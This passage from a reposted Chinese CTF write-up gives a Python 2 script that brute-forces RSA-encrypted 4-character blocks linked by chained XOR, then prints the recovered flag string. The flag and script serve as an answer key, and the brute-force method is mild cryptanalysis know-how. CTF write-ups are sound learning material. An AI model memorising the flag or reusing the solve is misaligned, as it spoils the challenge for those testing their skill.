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'
cipher = cipher.decode('base64').strip()
data = []
for i in xrange(52):
    data.append(cipher[i*256:i*256+256])
for i in xrange(51, 0, -1):
    data[i] = bytes_to_long(strxor(data[i-1], data[i]))
data = data[0:]
plain = 0
import itertools
tql = [''] * 51
for plain in itertools.product(*['0123456789abcdef'] * 4):
    plain = bytes_to_long(''.join(plain))
    c = pow(plain, e, n)
    if (c in data):
        print long_to_bytes(plain), data.index(c)
        tql[data.index(c)] = long_to_bytes(plain)
print ''.join(tql)

爆出来

10652cdf92fb9032a2e4c699448e3ca4ca266a667ccc5af2c95fae7f6de79fcd1fa52cfe72ee7fa3ab90a58c0c2310cfcc42dab372cd17cd0c8282834211d3bbd86324d4b7cb7bb279e6c34876ef259d3357ab66186e0bfe0c5db9c5a7067622dcbc06a42265

最后除一下,得到Flag

flag{64b60d7c2ddcf37f8d50358be1c35f45}

Crypto2 哈夫曼之谜

队友给的图,将就看吧

本文转载自 公众号梅子酒的书札 谢谢关注

有好的观点也欢迎投稿。

本文分享自微信公众号 - 无级安全(wujisec),作者:梅子酒

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-04-08

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • nuca_crypto_warmup_writeup

    用户5878089
  • 粘贴一篇刘大佬的笔记

    好久没有更新文章了,作为一个技术人,这是最后一片阵地,也是最后一点尊严。艰难的做,不为什么狗屁情怀,只是证明自己还存在,也不是为了对抗所谓的制度,新单位,就这样...

    用户5878089
  • X-NUCA17’第三期“企业安全众测”靶场挑战赛writeup

    周六打了两场比赛,湖湘杯和x-nuca,真心很累,现在把writeup贴出来,算是总结一下,成绩不是很好,大牛勿喷。

    用户5878089
  • 栈论 : 递归与栈式访问,如何用栈实现所有递归操作(函数调用底层篇)

    重大错误说明 : 栈顶的指针始终是指向最后一个入栈元素的位置的,不是最后一个入栈元素的位置上面!请读者留意 (PS : 后来又看了一下,好像也不是什么大问题.....

    执生
  • 语言生成实战:自己训练能讲“人话”的神经网络(上)

    在过去的几个月里,我在个人博客上写了100多篇文章。这是相当可观的内容量。我突然想到一个主意:

    AiTechYun
  • Linux:awk命令详解

    ? 简单使用: awk :对于文件中一行行的独处来执行操作 。 awk -F :'{print $1,$4}'   :使用‘:’来分割这一行,把这一行的第一...

    张戈
  • 初识ABP vNext(5):ABP扩展实体

    上一篇实现了前端vue部分的用户登录和菜单权限控制,但是有一些问题需要解决,比如用户头像、用户介绍字段目前还没有,下面就来完善一下。

    xhznl
  • Go 语言学习之流程控制

    在 Go 语言中,if...else... 语句的条件表达式必须是布尔类型,可以省略小括号,并且左大括号不能另起一行。通过代码,我们演示 if...else.....

    frankphper
  • C++核心准则:R.10: 避免使用malloc()和free()

    malloc() and free() do not support construction and destruction, and do not mix ...

    面向对象思考
  • [Python]循环中的else,break和continue详解

    原文链接:http://blog.csdn.net/humanking7/article/details/43792425

    祥知道

扫码关注云+社区

领取腾讯云代金券